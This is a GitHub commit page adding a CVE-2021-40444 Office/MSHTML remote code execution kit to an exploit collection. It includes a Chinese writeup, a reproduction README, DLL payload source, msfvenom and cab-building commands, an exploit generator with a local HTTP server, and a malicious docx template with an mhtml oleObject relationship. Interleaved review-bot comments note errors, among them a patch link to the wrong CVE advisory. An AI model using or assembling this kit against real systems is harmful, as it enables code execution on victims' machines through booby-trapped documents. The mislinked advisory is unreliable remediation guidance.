forked from Ascotbe/Kernelhub
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add IE RCE Vulnerability:sweet_potato:
Showing 26 changed files with 1,123 additions and 253 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,124 @@ | ||
### CVE-2021-40444 | ||
|
||
#### 描述 | ||
|
||
这个漏洞是IE浏览器的漏洞,但是offer相关组件默认使用的是IE浏览器,所以在offer相关组件禁用了ActiveX也一样可以执行 | ||
|
||
#### 影响版本 | ||
|
||
| Product | CPU Architecture | Version | Update | Tested | | ||
| ------------------- | ---------------- | ------- | ------ | -------- | | ||
| Windows 10 | x86/x64 | | | | | ||
| Windows 10 | x86/x64 | 1607 | | | | ||
| Windows 10 | x86/x64/AMD64 | 1809 | | | | ||
| Windows 10 | x86/x64/AMD64 | 1909 | | | | ||
| Windows 10 | x86/x64/AMD64 | 2004 | | ✔ | | ||
| Windows 10 | x86/x64/AMD64 | 20H2 | | | | ||
| Windows 10 | x86/x64/AMD64 | 21H1 | | | | ||
| Windows 7 | x86/x64 | | SP1 | | | ||
| Windows 8.1 | x86/x64 | | | | | ||
| Windows Rt 8.1 | | | | | | ||
| Windows Server 2008 | x86/x64 | | SP2 | | | ||
| Windows Server 2008 | x64 | R2 | SP1 | | | ||
| Windows Server 2012 | | | | | | ||
| Windows Server 2012 | | R2 | | | | ||
| Windows Server 2016 | | | | | | ||
| Windows Server 2019 | | | | | | ||
| Windows Server 2022 | | | | | | ||
| Windows Server | | 2004 | | | | ||
| Windows Server | | 20H2 | | | | ||
|
||
|
||
|
||
#### 修复补丁 | ||
|
||
``` | ||
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934 | ||
``` | ||
|
||
#### 利用原理 | ||
|
||
根据之前在野利用样本`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52`可以知道,其实就是利用默认浏览器(IE)加载ActiveX | ||
|
||
![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png) | ||
|
||
本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用 | ||
|
||
#### 利用方式 | ||
|
||
首先需要生成一个恶意的DLL文件,通过msf或者自己编译都行 | ||
|
||
- 自己编译 | ||
|
||
```c | ||
//calc.c | ||
#include <windows.h> | ||
|
||
void exec(void) { | ||
system("cmd /c calc"); | ||
return; | ||
} | ||
|
||
BOOL WINAPI DllMain( | ||
HINSTANCE hinstDLL, | ||
DWORD fdwReason, | ||
LPVOID lpReserved ) | ||
{ | ||
switch( fdwReason ) | ||
{ | ||
case DLL_PROCESS_ATTACH: | ||
exec(); | ||
break; | ||
|
||
case DLL_THREAD_ATTACH: | ||
break; | ||
|
||
case DLL_THREAD_DETACH: | ||
break; | ||
|
||
case DLL_PROCESS_DETACH: | ||
break; | ||
} | ||
return TRUE; | ||
} | ||
``` | ||
然后运行命令 | ||
``` | ||
i686-w64-mingw32-gcc -shared calc.c -o calc.dll | ||
``` | ||
- 通过msf编译 | ||
``` | ||
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll | ||
``` | ||
> 最好使用MSF生成DLL文件! | ||
> | ||
> 还有请看准对应机器,有些Windows 10 版本不存在该问题 | ||
安装环境所需要的依赖`sudo apt-get install lcab`,生成 cab用的 | ||
接着使用一键化脚本,`test/calc.dll`这个为你生成的哪个dll所在的绝对路径,`http://you_ip`你启动exp这台机器的IP | ||
``` | ||
cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip | ||
``` | ||
![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png) | ||
然后启动http服务 | ||
``` | ||
cd srv ; python3 -m http.server 80 | ||
``` | ||
接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功 | ||
![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif) | ||
#### 参考项目 | ||
- [prcabral](https://github.com/prcabral/CVE-2021-40444) |
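Review bot: the 修复补丁 (patch) section links the MSRC advisory for CVE-2021-36934, not CVE-2021-40444, so the one remediation pointer in this writeup sends readers to the wrong bulletin; replace it with the advisory for CVE-2021-40444, which is the CVE this file documents. Smaller points in the same hunk: the 描述 paragraph writes "offer" twice where Office is meant, and `http://you_ip` in the `exploit.py generate` command should be marked as a placeholder (your_ip) so it is not pasted literally.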
@@ -0,0 +1,77 @@ | ||
# CVE-2021-40444 | ||
|
||
Reproduce steps for CVE-2021-40444 | ||
|
||
These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file). | ||
|
||
## Generating docx | ||
|
||
Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://<HOST>` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file. | ||
|
||
Generate docx: | ||
|
||
`cd maldoc/ ; zip -r maldoc.docx *` | ||
|
||
## Generating malicious cab | ||
|
||
``` | ||
#include <windows.h> | ||
void exec(void) { | ||
system("C:\\Windows\\System32\\calc.exe"); | ||
return; | ||
} | ||
BOOL WINAPI DllMain( | ||
HINSTANCE hinstDLL, | ||
DWORD fdwReason, | ||
LPVOID lpReserved ) | ||
{ | ||
switch( fdwReason ) | ||
{ | ||
case DLL_PROCESS_ATTACH: | ||
exec(); | ||
break; | ||
case DLL_THREAD_ATTACH: | ||
break; | ||
case DLL_THREAD_DETACH: | ||
break; | ||
case DLL_PROCESS_DETACH: | ||
break; | ||
} | ||
return TRUE; | ||
} | ||
``` | ||
|
||
Exec: | ||
|
||
`i686-w64-mingw32-gcc -shared calc.c -o calc.dll` | ||
|
||
Generate cab (install lcab `sudo apt-get install lcab`) | ||
|
||
`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab` | ||
|
||
Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab` | ||
|
||
Execute Python script: `patch_cab.py` | ||
|
||
Finally, setup server: | ||
|
||
`cd www/ ; sudo python3 -m http.server 80` | ||
|
||
# End | ||
|
||
Execute now maldoc.docx in target VM | ||
|
||
If not working, make sure there is a `championship.inf` file at `C:\Users\<user>\AppData\Temp\` | ||
|
||
If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads. | ||
|
||
# More | ||
|
||
To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array) | ||
|
||
Anyway, there is already a deobfuscated version: `deob.html` |
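Review bot: this README is committed without any attribution or license notice, although it appears to reproduce the upstream prcabral/CVE-2021-40444 project that the other writeup lists under 参考项目; add the source and its license at the top of the file. Style points: the DllMain listing is fenced without a language tag (use ```c, as the other file in this commit does), "ocurrences" should be "occurrences", and "a folder reached from by exploit.html" should read "a folder reachable by exploit.html".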
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types> |
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> |
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties> |
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties> |
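Review bot: the docProps added in this and the preceding hunk are the in-the-wild sample's own metadata rather than freshly generated values: app.xml keeps Company "Consumers Association", TotalTime 34, Words 206 and AppVersion 16.0000, and core.xml keeps creator "Microsoft", lastModifiedBy "user", revision 6, created 2013-10-31T15:25:00Z and modified 2021-08-31T16:47:00Z. The README should state that these are unmodified properties of sample 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52, so that an analyst triaging a document built from this template attributes those values to the sample's lineage rather than to the technique.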
@@ -0,0 +1,2 @@ | ||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> | ||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships> |
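Review bot: the oleObject relationship rId6 carries the placeholder `<EXPLOIT_HOST_HERE>` twice inside its Target attribute, but the README's generation step tells the reader to replace `http://<HOST>`, so the documented edit does not match the committed file; use one placeholder spelling in both. Separately, a literal `<` is not permitted inside an XML attribute value, so this rels file is not well-formed XML until the placeholder is substituted, and any tooling that parses document.xml.rels before substitution will reject it; the README should say that the file is a template, not valid OOXML as committed.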